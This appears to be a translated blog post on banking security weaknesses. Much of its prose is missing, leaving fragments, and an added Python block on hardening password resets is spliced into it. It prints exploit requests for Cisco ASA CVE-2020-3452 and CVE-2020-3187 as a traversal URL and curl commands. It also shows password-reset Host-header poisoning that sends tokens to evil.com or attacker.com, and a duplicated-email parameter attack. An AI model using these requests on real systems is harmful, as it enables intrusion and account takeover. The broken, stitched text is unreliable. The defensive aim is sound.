Hello friends!
Today we will talk about the pressing security problems of banking systems, analyze common vulnerabilities, and draw conclusions from the current state of affairs.
Important
Again, the author does not claim to show you how to fully protect your system from cyber threats; the aim is only to show which problems deserve your attention.
1. SSL VPN Services
Banks very often use Cisco SSL VPN services to organize remote access to their internal network.
Cisco: CVE-2020-3452, CVE-2020-3187
1.1. CVE-2020-3452
CVE-2020-3452 - Cisco ASA FTD. , , , HTTP- .
https://bank.com/+CSCOT+/translation-table?type=mst&textdomain=/%252bCSCOE%252b/portal_inc.lua&default-language&lang=../
1.2. CVE-2020-3187
/session_password.html 200
curl -k -s -i https://<Cisco-VPN>/+CSCOE+/session_password.html
200? -
"/+CSCOU+/csco_logo.gif"
curl -k -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://<Cisco-VPN>/+CSCOE+/session_password.html
VPN .
2. & OAuth
- (SSO) OAuth 2.0, , , .
GET /auth/sso/cb?code=[sso token account] HTTP/1.1
Host: bank.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
CSRF . - .
SSO
SSO ,
SSO .
redirect_uri - url . / .
POST https://bank.com/reset.php HTTP/1.1
Accept: */*
Content-Type: application/json

Host: evil.com

Host: bank.com
X-Forwarded-Host: attacker.com

Host: target.com
Host: attacker.com
email .
https://evil.com/reset-password.php?token=12345678-1234-1234-1234-12345678901
- . , .
POST /resetPassword
[…]
email=victim@email.com&email=attacker@email.com
In the request you can see that the attacker simply duplicated the email parameter and specified his own address, to which the authorization token will then be sent.
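To make the two reset-flow defects above concrete from the defender's side, here is an added example (not code from the original post) that contrasts a reset-link builder which trusts the Host header and the last email value with a hardened one that uses a configured canonical origin and refuses a duplicated email parameter. The requests, the CANONICAL_BASE value and the function names are constructed for this example.

```python
from urllib.parse import parse_qs, urlsplit
import secrets

# Constructed for this example: the origin the reset link must always use,
# regardless of what Host / X-Forwarded-Host say.
CANONICAL_BASE = "https://bank.com"


def vulnerable_reset_link(headers, body):
    """'Before' form: trusts X-Forwarded-Host / Host to build the link and
    takes the last email= value, so a spoofed Host redirects the token and a
    duplicated email parameter (HPP) delivers it to the second address."""
    host = headers.get("X-Forwarded-Host") or headers.get("Host")
    email = body.split("email=")[-1]          # last duplicate wins
    token = secrets.token_urlsafe(32)
    return email, f"https://{host}/reset-password.php?token={token}"


def hardened_reset_link(headers, body):
    """Hardened form: the link is built only from CANONICAL_BASE, the Host
    header is checked for consistency but never used, and a body with zero
    or several email values is rejected. Returns (email, url) or None."""
    params = parse_qs(body, keep_blank_values=True)
    emails = params.get("email", [])
    if len(emails) != 1 or "@" not in emails[0]:
        return None                           # ambiguous or malformed: refuse
    # Host must match the canonical hostname; X-Forwarded-Host is ignored.
    if headers.get("Host", "") != urlsplit(CANONICAL_BASE).hostname:
        return None
    token = secrets.token_urlsafe(32)
    return emails[0], f"{CANONICAL_BASE}/reset-password.php?token={token}"


if __name__ == "__main__":
    # Constructed sample input mirroring the two abuse patterns from the post.
    hpp_body = "email=victim@email.com&email=attacker@email.com"
    spoofed = {"Host": "bank.com", "X-Forwarded-Host": "attacker.com"}
    print(vulnerable_reset_link(spoofed, hpp_body))   # attacker address, attacker host
    print(hardened_reset_link(spoofed, hpp_body))     # None
    print(hardened_reset_link(spoofed, "email=victim@email.com"))
```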
Conclusion
Keep your services up to date, whether it's SSL VPN or GlobalProtect.
Keep authentication secure.
As a further tip, use a Web Application Firewall (WAF) to reduce the chance that a vulnerability introduced by a code change can be exploited.
Good luck! All the best.